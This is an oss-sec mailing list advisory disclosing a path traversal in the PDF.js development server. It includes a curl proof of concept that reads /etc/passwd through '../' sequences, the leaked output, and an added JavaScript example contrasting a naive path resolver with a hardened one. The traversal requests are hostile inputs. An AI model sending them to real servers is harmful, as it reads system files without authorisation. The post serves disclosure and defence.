oss-sec mailing list archives
Path traversal in mozilla PDF.js [Unpatched]
From: Dhiraj Mishra <mishra.dhiraj95 () gmail com>
Date: Sat, 24 Nov 2018 13:16:49 +0530
## Summary

A path traversal issue was observed in Mozilla PDF.js, which is a PDF reader in JavaScript. This issue was observed during code review of PDF.js (gulpfile.js) (https://github.com/mozilla/pdf.js/blob/master/gulpfile.js#L1023). The Mozilla team says "The server with pdf.js is intended to be a development server and should not be exposed to public networks. I suppose we could update the docs to state that." and an upstream bug was filed against the same (https://github.com/mozilla/pdf.js/issues/10249).

## Installation

PDF.js is built into version 19+ of Firefox and a Chrome extension is also available on the Chrome Web Store. To install and get a local copy of PDF.js, here are the steps:

$ git clone https://github.com/mozilla/pdf.js.git
$ cd pdf.js
$ npm install -g gulp-cli
$ npm install
$ gulp server

## Exploitation

I've used the attribute --path-as-is from cURL to verify this issue.

$ curl --path-as-is -v http://127.0.0.1:8888/../../../../../../etc/passwd
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8888 (#0)
GET /../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: curl/7.58.0
Accept: */*
< HTTP/1.1 200 OK
< Accept-Ranges: bytes
< Content-Type: application/octet-stream
< Content-Length: 2745
< Date: Thu, 15 Nov 2018 06:34:32 GMT
< Connection: keep-alive
<
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

Thank you
Dhiraj (@mishradhiraj_)
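The class of bug reported above, shown as an added example that is not part of the original post and is not PDF.js code: a static file server that joins the raw request path onto its document root, next to a mapping that refuses anything resolving outside the root. The root `/srv/devserver`, the function names and the sample request paths (other than the one from the post) are constructed for illustration.

```javascript
'use strict';
// path.posix keeps the results identical on any host OS.
const path = require('path').posix;

// Constructed document root for this example (not a PDF.js path).
const ROOT = '/srv/devserver';

// Naive mapping: joins the raw request path onto the root. join()
// normalizes "..", so enough of them walk out of the root.
function naiveResolve(root, urlPath) {
  return path.join(root, urlPath);
}

// Hardened mapping: returns an absolute path inside root, or null.
function safeResolve(root, urlPath) {
  let decoded;
  try {
    decoded = decodeURIComponent(urlPath.split('?')[0]);
  } catch (e) {
    return null; // malformed percent-encoding
  }
  if (decoded.includes('\0')) return null; // NUL never belongs in a path
  const resolved = path.resolve(root, './' + decoded);
  // Compare against root + separator so a sibling such as
  // /srv/devserver-old does not pass a plain prefix test.
  if (resolved !== root && !resolved.startsWith(root + path.sep)) {
    return null;
  }
  return resolved; // callers should still realpath() to catch symlinks
}

// Constructed request paths; the first is the one from the post.
const SAMPLES = [
  '/../../../../../../etc/passwd',
  '/%2e%2e/%2e%2e/etc/passwd',
  '/../devserver-old/notes.txt',
  '/docs/../docs/index.html',
];

function report() {
  return SAMPLES.map((p) => ({
    request: p,
    naive: naiveResolve(ROOT, p),
    safe: safeResolve(ROOT, p),
  }));
}

console.log(report());
```

A `null` from `safeResolve` is where a server would answer 403 or 404 instead of opening the file.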